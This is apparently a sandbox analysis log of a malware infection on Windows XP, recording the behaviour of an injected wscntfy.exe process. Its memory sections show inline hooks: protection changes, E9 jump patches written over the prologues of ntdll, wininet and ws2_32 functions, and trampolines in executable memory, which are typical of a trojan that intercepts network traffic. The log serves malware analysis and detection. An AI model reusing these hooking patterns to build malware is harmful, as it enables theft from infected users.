Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2640241214
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2640245971
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2640258521
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2640273353
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2640282439
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2640285804
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2640299891
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2640323957
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2640326069
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2640330131
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2640513950
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2640556111
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2640558252
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2640579232
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2640590868
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2640592805
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2640629220
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2640647831
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2640671827
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2640807121
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2640809213
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2640842755
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2640854854
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 50C HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2641278240
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 50C HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2641281209
Analysis File: wscntfy.exe PID: 1860 Parent PID: 488
+ Sections
+ General
Start time: 05:44:44
Start date: 08/12/2011
Path: C:\WINDOWS\system32\wscntfy.exe
Commandline: C:\WINDOWS\system32\wscntfy.exe
Imagebase: 0x1000000
File size: 13824 bytes
MD5 hash: F92E1076C42FCD6DB3D72D8CFE9816D5
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 AFA4FF
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit DA0000 401408 own pid execute success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown DA0000 401408 own pid execute object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit DA0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit DA0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll query and write and read and execute image 68810000 270336 own pid read write success or wait 1
\KnownDlls\MSOERT2.dll write and read and execute unknown 68810000 270336 own pid read write object name not found 1
C:\WINDOWS\system32\msoert2.dll query and write and read and execute image 76880000 139264 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit DA0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit DA0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit DA0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit DC0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit DC0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit DC0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll query and write and read and execute image 71780000 73728 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit DE0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit DE0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit DE0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit DE0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 8C0000 262144 own pid read write object name not found 1 AF4018
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 AF4018
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 AF4018
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 AF4018
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1 AF4018
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1 AF4018
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1 AF4018
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 AF4018
C:\WINDOWS\system32\wininet.dll read commit C20000 667648 own pid readonly success or wait 1 AF4018
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1 AF4018
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AE5FBA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 15807505 success or wait 1 AE5F47
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 15807505 success or wait 1 AE5F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts NULL success or wait 1 AE5EB7
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} object name exists 1 AFA811
\BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} object name exists 1 AFA811
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 1 B00DFC
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
1748 1860 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF8106
1636 1860 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF8106
1768 1860 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF8106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 AFF078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe CA0000 10 B8 35 00 00 00 E9 A9 D1 C6 7B success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 5 E9 A4 AE 1E 84 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA000A 10 68 6C 02 00 00 E9 1E 63 C7 7B success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 5 E9 09 1F 1E 84 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0014 10 8B FF 55 8B EC E9 A3 2E 57 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 5 E9 FD 4B 8D 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA001E 10 8B FF 55 8B EC E9 7E 60 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 5 E9 6F 1A 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0028 10 8B FF 55 8B EC E9 94 E9 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 5 E9 A6 91 91 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0032 10 8B FF 55 8B EC E9 8A 2F 57 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 5 E9 4B 4C 8D 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA003C 10 8B FF 55 8B EC E9 4B 4D 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 5 E9 25 2F 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0046 10 8B FF 55 8B EC E9 9F 82 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 5 E9 0A FA 91 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0050 10 8B FF 55 8B EC E9 AB 90 55 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 5 E9 34 EC 8E 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA005A 10 8B FF 55 8B EC E9 98 89 53 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 5 E9 8B F3 90 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0064 12 6A 2C 68 10 7B 1C 77 E9 59 79 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 5 E9 F0 03 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0070 10 8B FF 55 8B EC E9 DE 9B 55 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 5 E9 B4 E1 8E 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA007A 10 8B FF 55 8B EC E9 E5 8F 53 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 5 E9 BB ED 90 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0084 10 8B FF 55 8B EC E9 4F B1 51 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 5 E9 5F CC 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA008E 10 8B FF 55 8B EC E9 98 3D E1 70 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 5 E9 3E E9 03 8F success or wait 1 AFF11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe C20000 C1F8C8 page read and write success or wait 1 AFA5EB
1860 C:\WINDOWS\system32\wscntfy.exe C20000 C1F8CC page read and write success or wait 1 AFA5EB
1860 C:\WINDOWS\system32\wscntfy.exe CA0000 C1F4C0 page execute and read and write success or wait 1 B03FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 AFF134
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 3 B08879
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid object name not found 2645694649
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2645695833
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2645700072
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2645701098
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2645707698
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2645710660
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2645721624
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2645725111
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: C20000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2645738001
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2645774092
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: C20000 Length: C1F8C8 Allocation Type: null Protection: page read and write success or wait 2645780882
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: C20000 Length: C1F8CC Allocation Type: null Protection: page read and write success or wait 2645781079
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2645834691
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2645835193
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2645835588
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2645835977
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2645836366
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645836833
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645837238
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645837645
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645838049
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2645838453
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2645838854
